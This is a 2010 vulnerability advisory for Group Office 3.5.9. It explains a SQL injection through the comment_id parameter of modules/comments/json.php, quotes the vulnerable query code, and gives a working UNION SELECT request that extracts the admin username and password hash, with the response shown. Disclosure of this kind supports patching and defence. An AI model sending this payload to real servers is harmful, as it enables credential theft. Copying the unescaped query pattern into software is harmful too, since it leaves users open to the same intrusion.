Group Office (comment_id) SQL Injection Vulnerability

                                                # Title
Group Office Remote SQL Injection Vulnerability

# Author
ADEO Security

# Published
17/07/2010

# Version
3.5.9 (Possible all versions)

# Vendor
http://www.group-office.com

# Download
http://sourceforge.net/projects/group-office/files/3.5/groupoffice-com-3.5.9.tar.gz/download

# Description
"Take your office online with Group-Office groupware. Share projects,
calendars, files and e-mail online with co-workers and clients. Easy
to use and fully customizable, Group-Office takes online collaboration
to the next level."

# Credit
Vulnerability founded by Canberk BOLAT
	- Mail: security[AT]adeo.com.tr
	- Web: http://security.adeo.com.tr , http://adeosecuritylabs.com

# Vulnerability
Remote attacker can inject sql codes to the system that host target
web application. Its high level vulnerability.

modules/comments/json.php:
23	$comment = $comments->get_comment(($_REQUEST['comment_id']));


In json.php 'get_comment' method called with value of HTTP Request
that's name 'comment_id'. In the 'get_comment' method, variable
'$comment_id' inserted to sql query and executed by application.

modules/comments/classes/comments.class.inc.php:
function get_comment($comment_id)
{
$this->query("SELECT * FROM co_comments WHERE id=".$this->escape($comment_id));
...

'escape' method can't prevent because attacker don't need single
quotes for successful exploitation.

# Exploitation
Request: http://server/groupoffice/modules/comments/json.php?task=comment&comment_id=888881+union+select+1,2,3,4,5,6,(select+concat_ws(0x3a,username,password)+from+go_users+where+id=1)

Response: {"data":{"id":"1","link_id":"2","link_type":"3","user_id":"4","ctime":"01-01-1970
1:00","mtime":"01-01-1970
1:00","comments":"admin:$1$sM5wjKS9$wJPfZZWO53uu8eCxjOesS\/","user_name":""},"success":true}

Application's response contains result of the attacker's injected sql codes.